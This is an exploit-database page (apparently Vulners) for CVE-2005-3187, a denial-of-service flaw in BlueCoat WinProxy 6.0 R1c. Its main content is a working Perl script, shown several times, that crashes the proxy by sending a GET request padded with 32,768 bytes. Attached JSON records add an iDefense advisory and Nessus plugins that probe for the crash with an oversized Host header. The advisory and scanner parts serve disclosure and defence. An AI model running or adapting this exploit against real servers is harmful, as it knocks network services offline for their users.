Search...

BlueCoat WinProxy 6.0 R1c - GET Denial of Service

2006-01-07T00:00:00

ID EXPLOITPACK:E86379F7666C9B6113F2A0ED146CD678
Type exploitpack
Reporter FistFuXXer
Modified 2006-01-07T00:00:00

Description

BlueCoat WinProxy 6.0 R1c - GET Denial of Service

                                        
                                            #!perl
#
# "WinProxy 6.0 R1c" Remote DoS Exploit
#
# Author:  FistFucker
# e-Mail:  FistFuXXer@gmx.de
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
#
# CVE info:
# CAN-2005-3187
#

use IO::Socket;

#
# destination IP address
#
$ip = '127.0.0.1';

#
# destination TCP port
#
$port = 80;


print '"WinProxy 6.0 R1c" Remote DoS Exploit'."\n\n";

$sock = IO::Socket::INET-&gt;new
(

    PeerAddr =&gt; $ip,
    PeerPort =&gt; $port,
    Proto    =&gt; 'tcp',
    Timeout  =&gt; 2

) or print '[-] Error: Could not establish a connection to the server!' and exit(1);

print "[+] Connected.\n";

$sock-&gt;send('GET /'. 'A' x 32768 ." HTTP/1.1\r\n\r\n");

print "[+] DoS string has been sent.";

close($sock);

# milw0rm.com [2006-01-07]

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:06", "references": [], "description": "\nBlueCoat WinProxy 6.0 R1c - GET Denial of Service", "edition": 1, "reporter": "FistFuXXer", "exploitpack": {"type": "dos", "platform": "windows"}, "published": "2006-01-07T00:00:00", "title": "BlueCoat WinProxy 6.0 R1c - GET Denial of Service", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3187"]}, {"type": "exploitdb", "idList": ["EDB-ID:1409"]}, {"type": "osvdb", "idList": ["OSVDB:22237"]}, {"type": "seebug", "idList": ["SSV:63328", "SSV:15813"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:10910"]}, {"type": "nessus", "idList": ["WINPROXY_61A.NASL", "WINPROXY_HTTP_61A.NASL"]}], "modified": "2020-04-01T19:04:06", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2020-04-01T19:04:06", "rev": 2}, "vulnersScore": 5.7}, "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3187"], "modified": "2006-01-07T00:00:00", "id": "EXPLOITPACK:E86379F7666C9B6113F2A0ED146CD678", "href": "", "viewCount": 1, "sourceData": "#!perl\n#\n# \"WinProxy 6.0 R1c\" Remote DoS Exploit\n#\n# Author: FistFucker\n# e-Mail: FistFuXXer@gmx.de\n#\n#\n# Advisory:\n# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363\n#\n# CVE info:\n# CAN-2005-3187\n#\n\nuse IO::Socket;\n\n#\n# destination IP address\n#\n$ip = '127.0.0.1';\n\n#\n# destination TCP port\n#\n$port = 80;\n\n\nprint '\"WinProxy 6.0 R1c\" Remote DoS Exploit'.\"\\n\\n\";\n\n$sock = IO::Socket::INET->new\n(\n\n PeerAddr => $ip,\n PeerPort => $port,\n Proto => 'tcp',\n Timeout => 2\n\n) or print '[-] Error: Could not establish a connection to the server!' and exit(1);\n\nprint \"[+] Connected.\\n\";\n\n$sock->send('GET /'. 'A' x 32768 .\" HTTP/1.1\\r\\n\\r\\n\");\n\nprint \"[+] DoS string has been sent.\";\n\nclose($sock);\n\n# milw0rm.com [2006-01-07]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}

{"cve": [{"lastseen": "2020-10-03T11:34:56", "description": "The listening daemon in Blue Coat Systems Inc. WinProxy before 6.1a allows remote attackers to cause a denial of service (crash) via a long HTTP request that causes an out-of-bounds read.", "edition": 3, "cvss3": {}, "published": "2005-12-31T05:00:00", "title": "CVE-2005-3187", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-3187"], "modified": "2011-03-08T02:25:00", "cpe": ["cpe:/a:bluecoat:winproxy:6.0"], "id": "CVE-2005-3187", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3187", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:bluecoat:winproxy:6.0:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:19", "bulletinFamily": "software", "cvelist": ["CVE-2005-3187"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.winproxy.com/\nSecurity Tracker: 1015441\n[Secunia Advisory ID:18288](https://secuniaresearch.flexerasoftware.com/advisories/18288/)\n[Related OSVDB ID: 22238](https://vulners.com/osvdb/OSVDB:22238)\n[Related OSVDB ID: 22239](https://vulners.com/osvdb/OSVDB:22239)\nOther Advisory URL: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0175.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0258.html\n[CVE-2005-3187](https://vulners.com/cve/CVE-2005-3187)\n", "modified": "2006-01-05T06:48:29", "published": "2006-01-05T06:48:29", "href": "https://vulners.com/osvdb/OSVDB:22237", "id": "OSVDB:22237", "type": "osvdb", "title": "Blue Coat WinProxy HTTP Request Overflow DoS", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T14:10:13", "description": "BlueCoat WinProxy <= 6.0 R1c (GET Request) Denial of Service Exploit. CVE-2005-3187. Dos exploit for windows platform", "published": "2006-01-07T00:00:00", "type": "exploitdb", "title": "BlueCoat WinProxy <= 6.0 R1c GET Request Denial of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3187"], "modified": "2006-01-07T00:00:00", "id": "EDB-ID:1409", "href": "https://www.exploit-db.com/exploits/1409/", "sourceData": "#!perl\n#\n# \"WinProxy 6.0 R1c\" Remote DoS Exploit\n#\n# Author: FistFucker\n# e-Mail: FistFuXXer@gmx.de\n#\n#\n# Advisory:\n# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363\n#\n# CVE info:\n# CAN-2005-3187\n#\n\nuse IO::Socket;\n\n#\n# destination IP address\n#\n$ip = '127.0.0.1';\n\n#\n# destination TCP port\n#\n$port = 80;\n\n\nprint '\"WinProxy 6.0 R1c\" Remote DoS Exploit'.\"\\n\\n\";\n\n$sock = IO::Socket::INET->new\n(\n\n PeerAddr => $ip,\n PeerPort => $port,\n Proto => 'tcp',\n Timeout => 2\n\n) or print '[-] Error: Could not establish a connection to the server!' and exit(1);\n\nprint \"[+] Connected.\\n\";\n\n$sock->send('GET /'. 'A' x 32768 .\" HTTP/1.1\\r\\n\\r\\n\");\n\nprint \"[+] DoS string has been sent.\";\n\nclose($sock);\n\n# milw0rm.com [2006-01-07]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1409/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:15", "bulletinFamily": "software", "cvelist": ["CVE-2005-3187"], "description": "Blue Coat WinProxy Remote DoS Vulnerability\r\n\r\niDefense Security Advisory 01.05.06\r\nhttp://www.idefense.com/intelligence/vulnerabilities/display.php?id=363\r\nJanuary 05, 2006\r\n\r\nI. BACKGROUND\r\n\r\nBlueCoat WinProxy is an Internet sharing proxy server designed for small\r\nto medium businesses. In addition to Internet sharing Winproxy also\r\nhosts a series of security, anti-spam and anti-spyware capabilities.\r\n\r\nMore information can be located from the vendors site at:\r\n\r\n http://www.winproxy.com/\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a design error in Blue Coat Systems Inc.'s\r\nWinProxy allows attackers to cause a denial of service (DoS) condition.\r\n\r\nThe vulnerability specifically exists due to improper handling of a long\r\nHTTP request that is approximately 32,768 bytes long. When such a\r\nrequest occurs, the process will crash while attempting to read past the\r\nend of a memory region.\r\n\r\nIII. ANALYSIS\r\n\r\nSuccessful exploitation requires an attacker to send a specially\r\nconstructed HTTP request to the WinProxy server on TCP port 80. This\r\nwill lead to a crash of the server and it will be unusable until it is\r\nrestarted.\r\n\r\nThis vulnerability may only be utilized by attackers who have access to\r\nthe network segment that contains the listening daemon, which in some\r\ncases is a private local area network.\r\n\r\nIV. DETECTION\r\n\r\niDefense has confirmed this vulnerability in WinProxy 6.0. Blue Coat has\r\nreported that previous versions are not affected.\r\n\r\nV. WORKAROUND\r\n\r\niDefense is currently unaware of any workarounds for this issue.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nBlue Coat has released WinProxy 6.1a to address this vulnerability.\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CAN-2005-3187 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n10/12/2005 Initial vendor notification\r\n10/12/2005 Initial vendor response\r\n01/05/2006 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nFistFuXXer is credited with the discovery of this vulnerability.\r\n\r\nGet paid for vulnerability research\r\nhttp://www.idefense.com/poi/teams/vcp.jsp\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2006 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.", "edition": 1, "modified": "2006-01-07T00:00:00", "published": "2006-01-07T00:00:00", "id": "SECURITYVULNS:DOC:10910", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10910", "title": "iDefense Security Advisory 01.05.06: Blue Coat WinProxy Remote DoS Vulnerability", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T14:54:00", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "BlueCoat WinProxy <= 6.0 R1c (GET Request) Denial of Service Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3187"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-63328", "id": "SSV:63328", "sourceData": "\n #!perl\r\n#\r\n# "WinProxy 6.0 R1c" Remote DoS Exploit\r\n#\r\n# Author: FistFucker\r\n# e-Mail: FistFuXXer@gmx.de\r\n#\r\n#\r\n# Advisory:\r\n# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363\r\n#\r\n# CVE info:\r\n# CAN-2005-3187\r\n#\r\n\r\nuse IO::Socket;\r\n\r\n#\r\n# destination IP address\r\n#\r\n$ip = '127.0.0.1';\r\n\r\n#\r\n# destination TCP port\r\n#\r\n$port = 80;\r\n\r\n\r\nprint '"WinProxy 6.0 R1c" Remote DoS Exploit'."\\n\\n";\r\n\r\n$sock = IO::Socket::INET->new\r\n(\r\n\r\n PeerAddr => $ip,\r\n PeerPort => $port,\r\n Proto => 'tcp',\r\n Timeout => 2\r\n\r\n) or print '[-] Error: Could not establish a connection to the server!' and exit(1);\r\n\r\nprint "[+] Connected.\\n";\r\n\r\n$sock->send('GET /'. 'A' x 32768 ." HTTP/1.1\\r\\n\\r\\n");\r\n\r\nprint "[+] DoS string has been sent.";\r\n\r\nclose($sock);\r\n\r\n# milw0rm.com [2006-01-07]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-63328"}, {"lastseen": "2017-11-19T22:32:47", "description": "No description provided by source.", "published": "2006-01-07T00:00:00", "type": "seebug", "title": "BlueCoat WinProxy <= 6.0 R1c (GET Request) Denial of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3187"], "modified": "2006-01-07T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15813", "id": "SSV:15813", "sourceData": "\n #!perl\n#\n# "WinProxy 6.0 R1c" Remote DoS Exploit\n#\n# Author: FistFucker\n# e-Mail: FistFuXXer@gmx.de\n#\n#\n# Advisory:\n# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363\n#\n# CVE info:\n# CAN-2005-3187\n#\n\nuse IO::Socket;\n\n#\n# destination IP address\n#\n$ip = '127.0.0.1';\n\n#\n# destination TCP port\n#\n$port = 80;\n\n\nprint '"WinProxy 6.0 R1c" Remote DoS Exploit'."\\n\\n";\n\n$sock = IO::Socket::INET->new\n(\n\n PeerAddr => $ip,\n PeerPort => $port,\n Proto => 'tcp',\n Timeout => 2\n\n) or print '[-] Error: Could not establish a connection to the server!' and exit(1);\n\nprint "[+] Connected.\\n";\n\n$sock->send('GET /'. 'A' x 32768 ." HTTP/1.1\\r\\n\\r\\n");\n\nprint "[+] DoS string has been sent.";\n\nclose($sock);\n\n# milw0rm.com [2006-01-07]\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15813", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-01T07:00:49", "description": "The remote host is running WinProxy, a proxy server for Windows. \n\nThe installed version of WinProxy's HTTP proxy fails to handle long\nrequests as well as requests with long Host headers. An attacker may\nbe able to exploit these issues to crash the proxy or even execute\narbitrary code on the affected host.", "edition": 23, "published": "2006-01-10T00:00:00", "title": "WinProxy < 6.1a HTTP Proxy Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3187", "CVE-2005-4085"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "WINPROXY_HTTP_61A.NASL", "href": "https://www.tenable.com/plugins/nessus/20391", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(20391);\n script_version(\"1.19\");\n\n script_cve_id(\"CVE-2005-3187\", \"CVE-2005-4085\");\n script_bugtraq_id(16147, 16148);\n\n script_name(english:\"WinProxy < 6.1a HTTP Proxy Multiple Vulnerabilities\");\n script_summary(english:\"Checks for multiple vulnerabilities in WinProxy < 6.1a HTTP Proxy\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web proxy server is affected by denial of service and\nbuffer overflow vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running WinProxy, a proxy server for Windows. \n\nThe installed version of WinProxy's HTTP proxy fails to handle long\nrequests as well as requests with long Host headers. An attacker may\nbe able to exploit these issues to crash the proxy or even execute\narbitrary code on the affected host.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?40f07cd6\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3a6c81a5\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8c88612f\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to WinProxy version 6.1a or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Blue Coat WinProxy Host Header Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2006/01/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/01/05\");\n script_cvs_date(\"Date: 2018/08/06 14:03:14\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n script_category(ACT_DENIAL);\n script_family(english:\"Firewalls\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"find_service2.nasl\", \"httpver.nasl\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80, dont_break: 1);\n\n\n# Make sure it looks like WinProxy.\nhelp = get_kb_banner(port: port, type: \"help\");\nif (help && \"Proxy-agent: BlueCoat-WinProxy\" >< help) {\n # Flag it as a proxy.\n register_service(port:port, ipproto:\"tcp\", proto:\"http_proxy\");\n\n # Try to exploit it.\n rq = http_mk_proxy_request(port: 80, item: \"/\", host: \"127.0.0.1\", method: \"GET\", scheme: \"http\", version: 10, add_headers: make_array(\"Host\", crap(32800)));\n\n w = http_send_recv_req(port: port, req: rq);\n # If we didn't get anything, try resending the query.\n w = http_send_recv3(port: port, item:\"/\", method:\"GET\");\n\n # There's a problem if we didn't get a response the second time.\n if (isnull(w)) security_hole(port);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T07:00:49", "description": "The remote host is running WinProxy, a proxy server for Windows. \n\nAccording to the Windows registry, the installed version of WinProxy\nsuffers from denial of service and buffer overflow vulnerabilities in\nits telnet and web proxy servers. An attacker may be able to exploit\nthese issues to crash the proxy or even execute arbitrary code on the\naffected host.", "edition": 22, "published": "2006-01-10T00:00:00", "title": "WinProxy < 6.1a Multiple Vulnerabilities (credentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3187", "CVE-2005-3654", "CVE-2005-4085"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "WINPROXY_61A.NASL", "href": "https://www.tenable.com/plugins/nessus/20393", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(20393);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2005-3187\", \"CVE-2005-3654\", \"CVE-2005-4085\");\n script_bugtraq_id(16147, 16148, 16149);\n\n script_name(english:\"WinProxy < 6.1a Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks for multiple vulnerabilities in WinProxy < 6.1a\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote proxy is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running WinProxy, a proxy server for Windows. \n\nAccording to the Windows registry, the installed version of WinProxy\nsuffers from denial of service and buffer overflow vulnerabilities in\nits telnet and web proxy servers. An attacker may be able to exploit\nthese issues to crash the proxy or even execute arbitrary code on the\naffected host.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?40f07cd6\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3a6c81a5\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?79b3006b\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8c88612f\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to WinProxy version 6.1a or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Blue Coat WinProxy Host Header Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2006/01/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/01/05\");\n script_cvs_date(\"Date: 2018/08/06 14:03:14\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Look in the registry for evidence of WinProxy.\nname = get_kb_item(\"SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/WinProxy 6/DisplayName\");\nif (name && name =~ \"^WinProxy \\(Version ([0-5]\\.|6\\.0)\") {\n security_hole(0);\n exit(0);\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}